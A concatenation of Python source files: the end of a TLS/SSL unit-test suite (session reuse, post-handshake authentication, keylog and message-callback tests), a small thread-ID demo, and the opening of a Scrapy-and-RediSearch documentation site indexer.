client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
            See RFC 8446, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.FlagEnum, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.FlagEnum, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
05_py_thread_id.py
|
""" py thread id """
import threading
def do_it() -> None:
print("did it")
print(threading.get_ident())
print(threading.current_thread().name)
thread1 = threading.Thread(target=do_it, name="thread1")
thread1.start()
thread2 = threading.Thread(target=do_it, name="thread2")
thread2.start()
thread1.join()
thread2.join()
print(threading.get_ident())
print(threading.current_thread().name)
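# Expected behaviour (a sketch, not captured output): each worker thread prints
# "did it", its own identifier from threading.get_ident(), and its name
# ("thread1" / "thread2"); the final two prints run in the main thread, so they
# show the main thread's identifier and the default name "MainThread".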
|
indexer.py
|
import datetime
import json
import hashlib
import logging
import multiprocessing
import time
from dataclasses import asdict
from queue import Queue
from threading import Thread
from typing import Dict, List, Callable, Set
from redis import ResponseError
import redis.exceptions
from redisearch.query import Query
import scrapy
from bs4 import BeautifulSoup, element
from redisearch import Client, IndexDefinition
from scrapy import signals
from scrapy.linkextractors import LinkExtractor
from scrapy.crawler import CrawlerProcess
from scrapy.signalmanager import dispatcher
from sitesearch.keys import Keys
from sitesearch.config import AppConfiguration
from sitesearch.connections import get_search_connection
from sitesearch.errors import ParseError
from sitesearch.models import SearchDocument, SiteConfiguration, TYPE_PAGE, TYPE_SECTION
from sitesearch.query_parser import TokenEscaper
ROOT_PAGE = "Redis Labs Documentation"
MAX_THREADS = multiprocessing.cpu_count() * 5
DEBOUNCE_SECONDS = 60 * 5 # Five minutes
SYNUPDATE_COMMAND = 'FT.SYNUPDATE'
TWO_HOURS = 60*60*2
INDEXING_LOCK_TIMEOUT = 60*60
SECTION_ID = "{url}:section:{hash}"
PAGE_ID = "{url}:page:{hash}"
Scorer = Callable[[SearchDocument, float], float]  # scorers return the adjusted score
ScorerList = List[Scorer]
Extractor = Callable[[str], List[str]]
Validator = Callable[[SearchDocument], None]
ValidatorList = List[Validator]
log = logging.getLogger(__name__)
def md5(string: str):
"""Return an md5 digest for an input string."""
return hashlib.md5(string.encode("utf-8")).hexdigest()
def page_id(url: str, body: str, title: str) -> str:
"""
Return the document ID for a page document.
We hash the body text and title of the page to help detect stale
page documents after indexing is complete.
"""
doc_hash = md5("".join([body, title]))
return PAGE_ID.format(url=url, hash=doc_hash)
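# Illustrative example (URL and text are hypothetical): since
# PAGE_ID = "{url}:page:{hash}", a call such as
#     page_id("https://example.com/docs/intro", body, "Intro")
# returns "https://example.com/docs/intro:page:<md5 of body + title>".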
def section_id(url: str, pos: int, body: str, page_title: str, part_title: str) -> str:
"""
Return the hash of a section document.
We hash the body, title, and position of the section to help
detect stale section documents after indexing is complete.
"""
doc_hash = md5("".join([body, part_title, page_title, str(pos)]))
return SECTION_ID.format(url=url, hash=doc_hash)
class DebounceError(Exception):
"""The indexing debounce threshold was not met"""
def next_element(elem):
"""Get sibling elements until we exhaust them."""
while elem is not None:
elem = elem.next_sibling
if hasattr(elem, 'name'):
return elem
def get_section(root_url: str, url: str) -> str:
"""Given a root URL and an input URL, determine the "section" of the current URL.
The section is the first portion of the path above the root, e.g. in the URL:
https://docs.redislabs.com/first/second/third
The section is "first".
"""
if not url.startswith(root_url):
return ""
try:
url_parts = url.replace(root_url, "").replace("//", "/").split("/")
s = [u for u in url_parts if u][0]
except (IndexError, TypeError, AttributeError) as e:
log.debug("Could not parse section: %s", e)
s = ""
return s
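# A quick sketch of the behaviour described above (the first pair is the
# docstring's own example; the second URL is hypothetical):
#     get_section("https://docs.redislabs.com", "https://docs.redislabs.com/first/second/third")
#     -> "first"
#     get_section("https://docs.redislabs.com", "https://elsewhere.example.com/page")
#     -> ""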
class DocumentParser:
def __init__(self, site_config: SiteConfiguration):
self.root_url = site_config.url
self.validators = site_config.validators
self.content_classes = site_config.content_classes
self.escaper = TokenEscaper(site_config.literal_terms)
def prepare_text(self, text: str, strip_symbols: bool = False) -> str:
base = text.strip().strip("\n").replace("\n", " ")
if strip_symbols:
base = base.replace("#", " ")
return self.escaper.escape(base)
def extract_parts(self, doc,
h2s: List[element.Tag]) -> List[SearchDocument]:
"""
Extract SearchDocuments from H2 elements in a SearchDocument.
Given a list of H2 elements in a page, we extract the HTML content for
that "part" of the page by grabbing all of the sibling elements and
converting them to text.
"""
docs = []
for i, tag in enumerate(h2s):
origin = tag
# Sometimes we stick the title in as a link...
if tag and tag.string is None:
tag = tag.find("a")
part_title = tag.get_text() if tag else ""
page = []
elem = next_element(origin)
while elem and elem.name != 'h2':
page.append(str(elem))
elem = next_element(elem)
part_title = self.prepare_text(part_title)
body = self.prepare_text(
BeautifulSoup('\n'.join(page), 'html.parser').get_text())
doc_id = section_id(doc.url, i, body, doc.title, part_title)
docs.append(
SearchDocument(doc_id=doc_id,
title=doc.title,
hierarchy=doc.hierarchy,
s=doc.s,
section_title=part_title or "",
body=body,
url=doc.url,
type=TYPE_SECTION,
position=i))
return docs
def prepare_document(self, url: str, html: str) -> List[SearchDocument]:
"""
Break an HTML string up into a list of SearchDocuments.
If the document has any H2 elements, it is broken up into
sub-documents, one per H2, in addition to a 'page' document
that we index with the entire content of the page.
"""
docs = []
soup = BeautifulSoup(html, 'html.parser')
content = soup
safe_url = url.split('?')[0].rstrip('/')
try:
title = self.prepare_text(soup.title.string.split("|")[0], True)
except AttributeError as e:
raise ParseError("Failed -- missing title") from e
# Use the first content class we find on the page. (i.e., main
# page content).
if self.content_classes:
for content_class in self.content_classes:
main_content = soup.select(content_class)
if main_content:
content = main_content[0]
break
s = get_section(self.root_url, url)
h2s = content.find_all('h2')
# Some pages use h3s for section titles...
if not h2s:
h2s = content.find_all('h3')
body = self.prepare_text(content.get_text(), True)
doc_id = page_id(safe_url, body, title)
doc = SearchDocument(doc_id=doc_id,
title=title,
section_title="",
hierarchy=[],
s=s,
body=body,
url=safe_url,
type=TYPE_PAGE)
# Index the entire document
docs.append(doc)
# If there are headers, break up the document and index each header
# as a separate document.
if h2s:
docs += self.extract_parts(doc, h2s)
return docs
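    # Illustrative sketch (the HTML is hypothetical): for a page titled
    # "My Page | Site" with two <h2> headings, "Install" and "Usage",
    # prepare_document() returns three SearchDocuments: one TYPE_PAGE document
    # for the whole page plus two TYPE_SECTION documents with section_title
    # "Install" (position 0) and "Usage" (position 1).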
def parse(self, url, html):
docs_for_page = self.prepare_document(url, html)
for doc in docs_for_page:
self.validate(doc)
return docs_for_page
def validate(self, doc: SearchDocument):
for v in self.validators:
v(doc)
class DocumentationSpiderBase(scrapy.Spider):
"""
A base class for spiders. Each base class should define the `url`
class attribute, or else Scrapy won't spider anything.
This can be done programmatically:
RedisDocsSpider = type(
'RedisDocsSpider',
(DocumentationSpiderBase,), {"site_config": docs_site_config})
If `site_config.validators` is defined, the indexer will call each
validator function for every `SearchDocument` that this scraper
produces before indexing it.
If `site_config.allow` or `site_config.deny` are defined, this
scraper will send them in as arguments to LinkExtractor when
extracting links on a page, allowing fine-grained control of URL
patterns to exclude or allow.
"""
name: str = "documentation"
doc_parser_class = DocumentParser
# Sub-classes should override these fields.
url: str = None
site_config: SiteConfiguration
def __init__(self, *args, **kwargs):
self.url = self.site_config.url
self.doc_parser = self.doc_parser_class(self.site_config)
super().__init__(*args, **kwargs)
self.extractor = LinkExtractor(allow=self.site_config.allow,
deny=self.site_config.deny)
def follow_links(self, response):
try:
links = [
l for l in self.extractor.extract_links(response)
if l.url.startswith(self.url)
]
        except AttributeError:  # Usually means this page isn't text -- could be a PDF, etc.
links = []
yield from response.follow_all(links, callback=self.parse)
def parse(self, response, **kwargs):
docs_for_page = []
if not response.url.startswith(self.url):
return
try:
docs_for_page = self.doc_parser.parse(response.url, response.body)
except ParseError as e:
log.error("Document parser error -- %s: %s", e, response.url)
else:
for doc in docs_for_page:
yield doc
yield from self.follow_links(response)
@property
def start_urls(self):
return [self.url]
class Indexer:
"""
Indexer crawls a web site specified in a SiteConfiguration and
indexes it in RediSearch.
Some notes on how we use search index aliases:
When we create an index, the index name we use is the site's
specified index name combined with the current time as a UNIX
timestamp.
Later, when indexing the site actually completes, we'll use the
site's specified index name as an alias. We'll delete any existing
aliases (from past indexing runs) as well as indexes from past
indexing jobs.
Whenever we try to search the index, we'll refer to the alias --
not the actual index name.
"""
def __init__(self,
site: SiteConfiguration,
app_config: AppConfiguration,
search_client: Client = None):
self.site = site
self.keys = Keys(app_config.key_prefix)
self.index_alias = self.keys.index_alias(self.site.url)
self.index_name = f"{self.index_alias}-{time.time()}"
self.escaper = TokenEscaper(site.literal_terms)
if search_client is None:
search_client = get_search_connection(self.index_name)
self.search_client = search_client
self.redis = self.search_client.redis
self.lock = self.keys.index_lock(site.url)
index_exists = self.search_index_exists()
if not index_exists:
self.setup_index()
# This is a map of already-crawled URLs to page titles, which we can
# use to construct a hierarchy for a given document by comparing each
# segment of its URL to known URLs.
self.seen_urls: Dict[str, str] = {}
# This is the set of all known document IDs. We'll use this to remove
# outdated documents from the index.
self.seen_ids: Set[str] = set()
@property
def url(self):
return self.site.url
def document_to_dict(self, document: SearchDocument):
"""
Given a SearchDocument, return a dictionary of the fields to index,
and options like the ad-hoc score.
Every callable in "scorers" is given a chance to influence the ad-hoc
score of the document.
